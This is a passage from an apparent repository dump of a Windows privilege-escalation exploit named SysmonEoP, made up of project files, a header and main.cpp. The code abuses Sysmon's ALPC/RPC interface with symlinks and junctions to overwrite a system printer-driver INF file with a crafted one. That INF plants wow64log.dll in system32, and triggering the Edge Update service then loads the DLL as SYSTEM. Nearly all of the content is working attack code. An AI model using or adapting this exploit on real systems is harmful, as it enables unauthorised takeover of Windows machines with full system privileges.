<CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\r\n  <ImportGroup Label=\"ExtensionSettings\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"Shared\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <PropertyGroup Label=\"UserMacros\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\r\n      <ProgramDataBaseFileName />\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n    <BuildLog>\r\n      <Path />\r\n    </BuildLog>\r\n  </ItemDefinitionGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"main.cpp\" />\r\n    <ClCompile Include=\"sysmon_c.c\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <Midl Include=\"sysmon.idl\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"def.h\" />\r\n    <ClInclude Include=\"resource.h\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ResourceCompile Include=\"resource.rc\" />\r\n  </ItemGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\r\n  <ImportGroup Label=\"ExtensionTargets\">\r\n  </ImportGroup>\r\n</Project>"
  },
  {
    "path": "v2/SysmonEoP/SysmonEOP.vcxproj.filters",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup>\r\n    <Filter Include=\"Source Files\">\r\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\r\n      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Header Files\">\r\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\r\n      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Resource Files\">\r\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\r\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\r\n    </Filter>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"main.cpp\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n    <ClCompile Include=\"sysmon_c.c\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <Midl Include=\"sysmon.idl\">\r\n      <Filter>Source Files</Filter>\r\n    </Midl>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"def.h\">\r\n      <Filter>Header Files</Filter>\r\n    </ClInclude>\r\n    <ClInclude Include=\"resource.h\">\r\n      <Filter>Header Files</Filter>\r\n    </ClInclude>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ResourceCompile Include=\"resource.rc\">\r\n      <Filter>Resource Files</Filter>\r\n    </ResourceCompile>\r\n  </ItemGroup>\r\n</Project>"
  },
  {
    "path": "v2/SysmonEoP/SysmonEOP.vcxproj.user",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <PropertyGroup />\r\n</Project>"
  },
  {
    "path": "v2/SysmonEoP/def.h",
    "content": "#include <Windows.h>\r\n#include <winternl.h>\r\n#include <combaseapi.h>\r\n#include <comdef.h>\r\n#include <stdio.h>\r\n#include <Wbemidl.h>\r\n#include \"sysmon_h.h\"\r\n#include \"resource.h\"\r\n\r\n\r\n#pragma comment(lib, \"wbemuuid.lib\")\r\n#pragma comment(lib,\"RpcRT4.lib\")\r\n#pragma warning(disable:4996)\r\n\r\nstruct __declspec(uuid(\"A6B716CB-028B-404D-B72C-50E153DD68DA\")) CLSID_MSEdge_Object;\r\nclass __declspec(uuid(\"79e0c401-b7bc-4de5-8104-71350f3a9b67\")) IGoogleUpdate : IUnknown {\r\npublic:\r\n\r\n\r\n    HRESULT CheckForUpdate(const WCHAR* guid, VOID* observer);\r\n    HRESULT Update(const WCHAR* guid, VOID* observer);\r\n\r\n};\r\n\r\n//Variables\r\nwchar_t object[] = L\"Global\\\\GLOBALROOT\\\\RPC Control\\\\CLIP-876BEE15B64B610D2505A44596ED92FBA9624DB923F9D608698BD8C8E64E4F1A\";\r\nwchar_t sysmon[] = L\"C:\\\\SYSMON\";\r\nHANDLE hSysmon;\r\n//Functions*\r\nLPWSTR Find();\r\nvoid load();\r\nBOOL AddPrinterDriverWmi();\r\nvoid Trigger(LPWSTR alpc);\r\nLPWSTR  BuildPath(LPCWSTR path);\r\nBOOL CreateJunction(HANDLE dir, LPCWSTR target);\r\nBOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target);\r\nBOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target);\r\nBOOL DeleteJunction(HANDLE dir);\r\nVOID SetJunction();\r\ntypedef struct _REPARSE_DATA_BUFFER {\r\n    ULONG  ReparseTag;\r\n    USHORT ReparseDataLength;\r\n    USHORT Reserved;\r\n    union {\r\n        struct {\r\n            USHORT SubstituteNameOffset;\r\n            USHORT SubstituteNameLength;\r\n            USHORT PrintNameOffset;\r\n            USHORT PrintNameLength;\r\n            ULONG  Flags;\r\n            WCHAR  PathBuffer[1];\r\n        } SymbolicLinkReparseBuffer;\r\n        struct {\r\n            USHORT SubstituteNameOffset;\r\n            USHORT SubstituteNameLength;\r\n            USHORT PrintNameOffset;\r\n            USHORT PrintNameLength;\r\n            WCHAR  PathBuffer[1];\r\n        } MountPointReparseBuffer;\r\n        struct {\r\n            UCHAR DataBuffer[1];\r\n        } GenericReparseBuffer;\r\n    } DUMMYUNIONNAME;\r\n} REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER;\r\ntypedef struct _OBJECT_DIRECTORY_INFORMATION {\r\n    UNICODE_STRING Name;\r\n    UNICODE_STRING TypeName;\r\n} OBJECT_DIRECTORY_INFORMATION, * POBJECT_DIRECTORY_INFORMATION;\r\n#define STATUS_MORE_ENTRIES 0x00000105\r\n#define STATUS_NO_MORE_ENTRIES 0x8000001A\r\n#define IO_REPARSE_TAG_MOUNT_POINT              (0xA0000003L)\r\n\r\ntypedef NTSYSAPI NTSTATUS(NTAPI* _NtCreateFile)(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK   IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);\r\ntypedef NTSYSAPI VOID(NTAPI* _RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);\r\ntypedef NTSYSAPI NTSTATUS(NTAPI* _NtOpenDirectoryObject)(OUT PHANDLE DirectoryHandle, IN ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);\r\ntypedef NTSYSAPI NTSTATUS(NTAPI* _NtQueryDirectoryObject)(_In_      HANDLE  DirectoryHandle, _Out_opt_ PVOID   Buffer, _In_ ULONG Length, _In_ BOOLEAN ReturnSingleEntry, _In_  BOOLEAN RestartScan, _Inout_   PULONG  Context, _Out_opt_ PULONG  ReturnLength);\r\ntypedef NTSYSCALLAPI NTSTATUS(NTAPI* _NtSetInformationFile)(HANDLE  FileHandle,PIO_STATUS_BLOCK  IoStatusBlock,PVOID  FileInformation,ULONG  Length,ULONG FileInformationClass);\r\n\r\n_RtlInitUnicodeString pRtlInitUnicodeString;\r\n_NtCreateFile pNtCreateFile;\r\n_NtSetInformationFile pNtSetInformationFile;\r\n_NtQueryDirectoryObject pNtQueryDirectoryObject;\r\n_NtOpenDirectoryObject pNtOpenDirectoryObect;"
  },
  {
    "path": "v2/SysmonEoP/main.cpp",
    "content": "#include \"def.h\"\r\n\r\n\r\nint wmain(int argc, wchar_t* argv[])\r\n{\r\n    load();\r\n    LPWSTR alpc = Find();\r\n    HANDLE h1;\r\n    if (alpc == NULL) {\r\n        printf(\"[!] Failed to find ALPC port!\\n\");\r\n        return 1;\r\n    }\r\n    \r\n    DosDeviceSymLink(object, BuildPath(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\"));\r\n    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SetJunction, NULL, 0, NULL);\r\n   \r\n    Trigger(alpc);\r\n   \r\n    do {\r\n        h1 = CreateFile(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\", GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_DELETE|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\r\n    } while (h1 != INVALID_HANDLE_VALUE);\r\n    Sleep(500);\r\n    CloseHandle(hSysmon);\r\n    printf(\"[+] Driver setup info file deleted!\\n\");\r\n    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SetJunction, NULL, 0, NULL);\r\n    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Trigger, alpc, 0, NULL);\r\n    do {\r\n        h1 = CreateFile(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\", GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\r\n    } while (h1 == INVALID_HANDLE_VALUE);\r\n    HMODULE hm = GetModuleHandle(NULL);\r\n    HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_DLL1), L\"dll\");\r\n    DWORD DllSize = SizeofResource(hm, res);\r\n    void* DllBuff = LoadResource(hm, res);\r\n    printf(\"[+] Driver setup info file written.\\n\");\r\n    if (!AddPrinterDriverWmi()) {\r\n        printf(\"[!] Failed to add print driver!\\n\");\r\n        return 1;\r\n    }\r\n   \r\n    HANDLE dll;\r\n    do {\r\n        Sleep(1000);\r\n        dll = CreateFile(L\"C:\\\\windows\\\\system32\\\\wow64log.dll\", GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_DELETE | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\r\n    } while (dll == INVALID_HANDLE_VALUE);\r\n    printf(\"[+] DLL created!\\n\");\r\n    WriteFile(dll, DllBuff, DllSize, NULL, NULL);\r\n    CloseHandle(dll);\r\n    printf(\"[*] Triggering Edge Update service!\\n\");\r\n    HRESULT coini = CoInitialize(NULL);\r\n    IGoogleUpdate* updater = NULL;\r\n\r\n    HRESULT hr = CoCreateInstance(__uuidof(CLSID_MSEdge_Object), NULL, CLSCTX_LOCAL_SERVER, __uuidof(updater), (PVOID*)&updater);\r\n    \r\n   \r\n    DelDosDeviceSymLink(object, BuildPath(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\"));\r\n    DeleteJunction(hSysmon);\r\n    while(!DeleteFile(L\"C:\\\\windows\\\\system32\\\\wow64log.dll\")){}\r\n    return 0;\r\n}\r\n\r\nVOID SetJunction() {\r\n    hSysmon = INVALID_HANDLE_VALUE;\r\n    ;\r\n    SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);\r\n\r\n\r\n\r\n    do {\r\n        hSysmon = CreateFile(L\"C:\\\\sysmon\", FILE_WRITE_ATTRIBUTES | DELETE, FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_DELETE_ON_CLOSE, NULL);\r\n\r\n    } while (hSysmon == INVALID_HANDLE_VALUE);\r\n\r\n\r\n    CreateJunction(hSysmon, L\"\\\\RPC Control\");\r\n\r\n}\r\n\r\nvoid load() {\r\n    HMODULE ntdll = LoadLibraryW(L\"ntdll.dll\");\r\n    if (ntdll != NULL) {\r\n        pRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(ntdll, \"RtlInitUnicodeString\");\r\n        pNtCreateFile = (_NtCreateFile)GetProcAddress(ntdll, \"NtCreateFile\");\r\n        pNtQueryDirectoryObject = (_NtQueryDirectoryObject)GetProcAddress(ntdll, \"NtQueryDirectoryObject\");\r\n        pNtOpenDirectoryObect = (_NtOpenDirectoryObject)GetProcAddress(ntdll, \"NtOpenDirectoryObject\");\r\n        pNtSetInformationFile = (_NtSetInformationFile)GetProcAddress(ntdll, \"NtSetInformationFile\");\r\n    }\r\n    if (pRtlInitUnicodeString == NULL || pNtCreateFile == NULL || pNtQueryDirectoryObject == NULL || pNtOpenDirectoryObect == NULL|| pNtSetInformationFile == NULL) {\r\n        printf(\"Cannot load api's %d\\n\", GetLastError());\r\n        exit(0);\r\n    }\r\n\r\n}\r\n\r\n\r\n\r\nBOOL CreateJunction(HANDLE hDir, LPCWSTR target) {\r\n    HANDLE hJunction;\r\n    DWORD cb;\r\n    wchar_t printname[] = L\"\";\r\n    if (hDir == INVALID_HANDLE_VALUE) {\r\n        printf(\"[!] HANDLE invalid!\\n\");\r\n        return FALSE;\r\n    }\r\n    SIZE_T TargetLen = wcslen(target) * sizeof(WCHAR);\r\n    SIZE_T PrintnameLen = wcslen(printname) * sizeof(WCHAR);\r\n    SIZE_T PathLen = TargetLen + PrintnameLen + 12;\r\n    SIZE_T Totalsize = PathLen + (DWORD)(FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer));\r\n    PREPARSE_DATA_BUFFER Data = (PREPARSE_DATA_BUFFER)malloc(Totalsize);\r\n    Data->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;\r\n    Data->ReparseDataLength = PathLen;\r\n    Data->Reserved = 0;\r\n    Data->MountPointReparseBuffer.SubstituteNameOffset = 0;\r\n    Data->MountPointReparseBuffer.SubstituteNameLength = TargetLen;\r\n    memcpy(Data->MountPointReparseBuffer.PathBuffer, target, TargetLen + 2);\r\n    Data->MountPointReparseBuffer.PrintNameOffset = (USHORT)(TargetLen + 2);\r\n    Data->MountPointReparseBuffer.PrintNameLength = (USHORT)PrintnameLen;\r\n    memcpy(Data->MountPointReparseBuffer.PathBuffer + wcslen(target) + 1, printname, PrintnameLen + 2);\r\n    WCHAR dir[MAX_PATH] = { 0x0 };\r\n    if (DeviceIoControl(hDir, FSCTL_SET_REPARSE_POINT, Data, Totalsize, NULL, 0, &cb, NULL) != 0)\r\n    {\r\n\r\n        GetFinalPathNameByHandle(hDir, dir, MAX_PATH, 0);\r\n        printf(\"[+] Junction %ls -> %ls created!\\n\", dir, target);\r\n        free(Data);\r\n        return TRUE;\r\n\r\n    }\r\n    else\r\n    {\r\n\r\n        printf(\"[!] Error: %d. Exiting\\n\", GetLastError());\r\n        free(Data);\r\n        return FALSE;\r\n    }\r\n}\r\nBOOL DeleteJunction(HANDLE handle) {\r\n    REPARSE_GUID_DATA_BUFFER buffer = { 0 };\r\n    BOOL ret;\r\n    buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;\r\n    DWORD cb = 0;\r\n    IO_STATUS_BLOCK io;\r\n    if (handle == INVALID_HANDLE_VALUE) {\r\n        printf(\"[!] HANDLE invalid!\\n\");\r\n        return FALSE;\r\n    }\r\n    WCHAR dir[MAX_PATH] = { 0x0 };\r\n    if (DeviceIoControl(handle, FSCTL_DELETE_REPARSE_POINT, &buffer, REPARSE_GUID_DATA_BUFFER_HEADER_SIZE, NULL, NULL, &cb, NULL)) {\r\n        GetFinalPathNameByHandle(handle, dir, MAX_PATH, 0);\r\n        printf(\"[+] Junction %ls deleted!\\n\", dir);\r\n        return TRUE;\r\n    }\r\n    else\r\n    {\r\n        printf(\"[!] Error: %d.\\n\", GetLastError());\r\n        return FALSE;\r\n    }\r\n}\r\n\r\nBOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target) {\r\n    if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH, object, target)) {\r\n        printf(\"[+] Symlink %ls -> %ls created!\\n\", object, target);\r\n        return TRUE;\r\n\r\n    }\r\n    else\r\n    {\r\n        printf(\"error :%d\\n\", GetLastError());\r\n        return FALSE;\r\n\r\n    }\r\n}\r\n\r\nBOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target) {\r\n    if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH | DDD_REMOVE_DEFINITION | DDD_EXACT_MATCH_ON_REMOVE, object, target)) {\r\n        printf(\"[+] Symlink %ls -> %ls deleted!\\n\", object, target);\r\n        return TRUE;\r\n\r\n    }\r\n    else\r\n    {\r\n        printf(\"error :%d\\n\", GetLastError());\r\n        return FALSE;\r\n\r\n\r\n    }\r\n}\r\n\r\nLPWSTR Find() {\r\n    HANDLE rpccontrolobj;\r\n    OBJECT_ATTRIBUTES obj;\r\n    const wchar_t rpccontrol[] = L\"\\\\RPC Control\";\r\n    UNICODE_STRING unicode_string = { 0 };\r\n    pRtlInitUnicodeString(&unicode_string, rpccontrol);\r\n    InitializeObjectAttributes(&obj, &unicode_string, 0, 0, 00);\r\n    NTSTATUS result = pNtOpenDirectoryObect(&rpccontrolobj, 0x0001 | 0x0002, &obj);\r\n    if (result == 0) {\r\n\r\n        BYTE* buffer = (BYTE*)malloc(100000);\r\n\r\n        ULONG start = 0, index = 0, bytes;\r\n        BOOLEAN restart = TRUE;\r\n        for (;;)\r\n        {\r\n            result = pNtQueryDirectoryObject(rpccontrolobj, (PBYTE)buffer, 100000, FALSE, restart, &index, &bytes);\r\n            if (result == 0)\r\n            {\r\n                POBJECT_DIRECTORY_INFORMATION objectlist = (POBJECT_DIRECTORY_INFORMATION)buffer;\r\n                for (ULONG i = 0; i < index - start; i++)\r\n                {\r\n                    if (0 == wcsncmp(objectlist[i].TypeName.Buffer, L\"ALPC Port\", objectlist[i].TypeName.Length / sizeof(WCHAR)))\r\n                    {\r\n                        if (wcsstr(objectlist[i].Name.Buffer, L\"syscliprpc\")) {\r\n                            return objectlist[i].Name.Buffer;\r\n\r\n                        }\r\n\r\n\r\n                    }\r\n                }\r\n            }\r\n            if (STATUS_MORE_ENTRIES == result)\r\n            {\r\n                start = index;\r\n                restart = FALSE;\r\n                continue;\r\n            }\r\n\r\n            else if (STATUS_NO_MORE_ENTRIES == 0 || (result == 0)) {\r\n                CloseHandle(rpccontrolobj);\r\n                break;\r\n\r\n\r\n\r\n            }\r\n        }\r\n        return NULL;\r\n    }\r\n    return NULL;\r\n}\r\n\r\nvoid Trigger(LPWSTR alpc)\r\n{\r\n    RPC_STATUS status;\r\n    RPC_WSTR StringBinding;\r\n    RPC_BINDING_HANDLE Binding;\r\n    wchar_t data[] = L\"; Windows Inbox Printer Drivers\\n\\n[Version]\\nSignature=\\\"$Windows NT$\\\"\\nProvider=\\\"Microsoft\\\"\\nClassGUID={4D36E979-E325-11CE-BFC1-08002BE10318}\\nClass=Printer\\nCatalogFile=prnge001.cat\\nDriverVer = 06/21/2006,10.0.19041.1\\n\\n\\n[Manufacturer]\\n\\\"Generic\\\"=Generic,NTamd64\\n\\n[Test.CopyFiles]\\nwow64log.dll,TTY.DLL,,4\\n\\n[Test.CopyFiles.security]\\n\\\"D:AI(A;;GA;;;SY)(A;;GA;;;AU)(A;;GA;;;BA)\\\"\\n\\n\\n[Generic.NTamd64]\\n\\\"Generic / Text Only\\\"                                         = TTY.GPD,GenericGeneric_/_Tex8040,Generic_/_Text_Only\\n\\\"Generic IBM Graphics 9pin\\\"                                   = GENIBM9.GPD,GenericGeneric_IBM_GD35A,Generic_IBM_Graphics_9pin\\n\\\"Generic IBM Graphics 9pin wide\\\"                              = GENIBM9W.GPD,GenericGeneric_IBM_GC7D5,Generic_IBM_Graphics_9pin_wide\\n\\\"MS Publisher Color Printer\\\"                                  = MSGENCOL.PPD,GenericMS_Publisher_25C7,MS_Publisher_Color_Printer\\n\\\"MS Publisher Imagesetter\\\"                                    = MSGENBW.PPD,GenericMS_Publisher_B397,MS_Publisher_Imagesetter\\n\\n\\n[TTY.GPD]\\nCopyFiles=@TTYRES.DLL,@TTY.INI,@TTY.DLL,@TTYUI.DLL,@TTY.GPD,@TTYUI.HLP\\nCopyFiles=Test.CopyFiles\\nDataFile=TTY.GPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\\\"\\n\\n[GENIBM9.GPD]\\nCopyFiles=@OK9IBRES.DLL,@GENIBM9.GPD\\nDataFile=GENIBM9.GPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\\\"\\n\\n[GENIBM9W.GPD]\\nCopyFiles=@OK9IBRES.DLL,@GENIBM9W.GPD\\nDataFile=GENIBM9W.GPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\\\"\\n\\n[MSGENCOL.PPD]\\nCopyFiles=@MSGENCOL.PPD\\nDataFile=MSGENCOL.PPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F1},PSCRIPT.OEM,PSCRIPT_DATA\\\"\\n\\n[MSGENBW.PPD]\\nCopyFiles=@MSGENBW.PPD\\nDataFile=MSGENBW.PPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F1},PSCRIPT.OEM,PSCRIPT_DATA\\\"\\n\\n[DestinationDirs]\\nDefaultDestDir=66000\\nTest.CopyFiles=11\\n\\n[SourceDisksFiles]\\nMSGENBW.PPD  = 1\\nTTY.DLL      = 1\\nTTYUI.HLP    = 1\\nGENIBM9W.GPD = 1\\nTTY.INI      = 1\\nMSGENCOL.PPD = 1\\nGENIBM9.GPD  = 1\\nOK9IBRES.DLL = 1\\nTTYUI.DLL    = 1\\nTTYRES.DLL   = 1\\nTTY.GPD      = 1\\n\\n[PrinterPackageInstallation.amd64]\\nPackageAware=TRUE\\nCoreDriverDependencies={D20EA372-DD35-4950-9ED8-A6335AFE79F0},{D20EA372-DD35-4950-9ED8-A6335AFE79F1}\\nInboxVersionRequired=UseDriverVer\\n\\n[Strings]\\n;Non-Localizable\\n\\n;Localizable\\nDisk1=\\\"Windows Installation Disc\\\"\\n\\n[SourceDisksNames.x86]\\n1   = %Disk1%,,,\\\"I386\\\"\\n\\n[SourceDisksNames.amd64]\\n1   = %Disk1%,,,\\\"Amd64\\\"\\n\\n[SourceDisksNames.ia64]\\n1   = %Disk1%,,,\\\"Ia64\\\"\\n\\n[SourceDisksNames.arm]\\n1   = %Disk1%,,,\\\"arm\\\"\\n\\n[SourceDisksNames.arm64]\\n1   = %Disk1%,,,\\\"arm64\\\"\\n\";\r\n    status = RpcStringBindingCompose(NULL, (RPC_WSTR)L\"ncalrpc\", NULL, (RPC_WSTR)alpc, NULL, &StringBinding);\r\n\r\n    status = RpcBindingFromStringBinding(StringBinding, &Binding);\r\n    status = RpcStringFree(&StringBinding);\r\n    RpcTryExcept\r\n    {\r\n        \r\n        Proc1(Binding, 3036,data);\r\n    }\r\n    RpcExcept(EXCEPTION_EXECUTE_HANDLER);\r\n    {\r\n        printf(\"Error: %d\\n\",RpcExceptionCode());\r\n    }\r\n    RpcEndExcept\r\n\r\n        status = RpcBindingFree(&Binding);\r\n}\r\n\r\n\r\nLPWSTR  BuildPath(LPCWSTR path) {\r\n    wchar_t ntpath[MAX_PATH];\r\n    swprintf(ntpath, L\"\\\\??\\\\%s\", path);\r\n    return ntpath;\r\n}\r\nBOOL AddPrinterDriverWmi() {\r\n    HRESULT hr;\r\n    hr = CoInitializeEx(0, COINIT_MULTITHREADED);\r\n    if (FAILED(hr))\r\n    {\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    hr = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL);\r\n    if (FAILED(hr))\r\n    {\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    IWbemLocator* pLoc = NULL;\r\n\r\n    hr = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, 